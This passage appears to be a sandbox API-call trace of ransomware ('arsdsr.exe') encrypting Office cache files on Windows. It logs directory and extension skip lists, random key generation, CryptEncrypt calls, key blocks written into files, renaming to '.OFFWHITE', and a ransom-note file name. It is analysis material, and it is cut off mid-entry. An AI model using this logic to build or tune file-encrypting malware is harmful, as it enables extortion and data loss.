[0087.741] WriteFile (in: hFile=0x21c, lpBuffer=0x547d68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d68*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.741] GetProcessHeap () returned 0x500000 [0087.741] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1915) returned 0x5557b0 [0087.741] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.741] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1915, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x1915, lpOverlapped=0x0) returned 1 [0087.743] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.743] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x1915, lpOverlapped=0x0) returned 1 [0087.743] GetProcessHeap () returned 0x500000 [0087.743] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.743] CloseHandle (hObject=0x21c) returned 1 [0087.746] GetProcessHeap () returned 0x500000 [0087.746] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.746] GetProcessHeap () returned 0x500000 [0087.746] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.746] GetProcessHeap () returned 0x500000 [0087.746] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.746] GetProcessHeap () returned 0x500000 [0087.746] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.746] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" [0087.746] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.OFFWHITE" [0087.746] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.offwhite")) returned 1 [0087.747] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2=".") returned 1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="..") returned 1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="...") returned 1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="windows") returned -1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="$recycle.bin") returned 1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="rsa") returned -1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="ntuser.dat") returned 1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="programdata") returned -1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="appdata") returned 1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="program files") returned -1 [0087.747] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="program files (x86)") returned -1 [0087.747] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.747] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="PrjPrrWW.cab" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" [0087.747] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.747] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.747] PathFindExtensionW (pszPath="PrjPrrWW.cab") returned=".cab" [0087.747] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0087.747] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0087.747] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0087.747] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0087.747] lstrcmpiW (lpString1="setup.exe", lpString2=".") returned 1 [0087.747] lstrcmpiW (lpString1="setup.exe", lpString2="..") returned 1 [0087.747] lstrcmpiW (lpString1="setup.exe", lpString2="...") returned 1 [0087.747] lstrcmpiW (lpString1="setup.exe", lpString2="windows") returned -1 [0087.747] lstrcmpiW (lpString1="setup.exe", lpString2="$recycle.bin") returned 1 [0087.747] lstrcmpiW (lpString1="setup.exe", lpString2="rsa") returned 1 [0087.747] lstrcmpiW (lpString1="setup.exe", lpString2="ntuser.dat") returned 1 [0087.748] lstrcmpiW (lpString1="setup.exe", lpString2="programdata") returned 1 [0087.748] lstrcmpiW (lpString1="setup.exe", lpString2="appdata") returned 1 [0087.748] lstrcmpiW (lpString1="setup.exe", lpString2="program files") returned 1 [0087.748] lstrcmpiW (lpString1="setup.exe", lpString2="program files (x86)") returned 1 [0087.748] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.748] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="setup.exe" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" [0087.748] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.748] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.748] PathFindExtensionW (pszPath="setup.exe") returned=".exe" [0087.748] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0087.748] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0087.748] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0087.748] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.748] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" [0087.748] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.748] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.748] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0087.748] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.748] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.748] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.748] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.748] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.749] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.749] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.749] GetProcessHeap () returned 0x500000 [0087.749] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d78 [0087.749] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.749] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=16683) returned 1 [0087.750] GetProcessHeap () returned 0x500000 [0087.750] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.750] GetProcessHeap () returned 0x500000 [0087.750] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.750] GetProcessHeap () returned 0x500000 [0087.750] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.750] GetProcessHeap () returned 0x500000 [0087.750] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.750] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.750] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.750] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.750] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.750] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.750] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.750] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.750] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.750] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.750] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.750] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.750] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.751] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x412b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.751] SetLastError (dwErrCode=0x0) [0087.751] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.753] GetLastError () returned 0x0 [0087.753] GetLastError () returned 0x0 [0087.753] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x422b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.753] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.753] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x432b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.753] WriteFile (in: hFile=0x21c, lpBuffer=0x547d78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d78*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.753] GetProcessHeap () returned 0x500000 [0087.753] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x412b) returned 0x5557b0 [0087.753] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.753] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x412b, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x412b, lpOverlapped=0x0) returned 1 [0087.755] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.755] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x412b, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x412b, lpOverlapped=0x0) returned 1 [0087.755] GetProcessHeap () returned 0x500000 [0087.755] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.755] CloseHandle (hObject=0x21c) returned 1 [0087.761] GetProcessHeap () returned 0x500000 [0087.761] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.761] GetProcessHeap () returned 0x500000 [0087.761] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.761] GetProcessHeap () returned 0x500000 [0087.761] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.761] GetProcessHeap () returned 0x500000 [0087.761] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.761] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" [0087.761] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0087.761] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0087.762] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0087.762] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0087.762] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0087.762] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0087.762] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0087.762] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{91140000-0057-0000-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C" [0087.763] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.763] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.763] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0087.763] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0087.766] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0087.766] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0087.766] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0087.766] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0087.766] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2=".") returned 1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="..") returned 1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="...") returned 1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="windows") returned -1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$recycle.bin") returned 1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="rsa") returned -1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="ntuser.dat") returned 1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="programdata") returned -1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="appdata") returned 1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="program files") returned -1 [0087.766] lstrcmpiW (lpString1="Office32WW.msi", lpString2="program files (x86)") returned -1 [0087.767] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.767] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.msi" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0087.767] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.767] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.767] PathFindExtensionW (pszPath="Office32WW.msi") returned=".msi" [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0087.767] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0087.767] lstrcmpiW 